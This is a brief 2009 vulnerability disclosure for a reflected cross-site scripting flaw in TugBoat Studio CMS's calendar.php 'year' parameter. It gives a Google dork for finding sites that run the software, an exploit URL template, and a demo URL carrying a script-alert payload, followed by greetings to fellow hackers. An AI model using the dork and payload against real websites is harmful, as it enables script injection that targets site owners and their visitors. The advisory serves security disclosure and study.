===========================================================================================

 Title    : Cross-site Scripting (XSS) Vulnerability
 Software : TugBoat Studio CMS
 Vendor   : http://tugboatcms.com/
 
 Date     : 26 April 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 ===========================================================================================

 [-] Google Dork

     "Powered by TugBoat Studio"

 [-] Vulnerable

     calendar.php

 [-] Exploit

     http://[site]/[path]/calendar.php?year=[XSS]

 [-] Demo

     http://demo.tugboatcms.com/pages/calendar.php?year=<script>alert(123)</script>

 ===========================================================================================

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!

 ===========================================================================================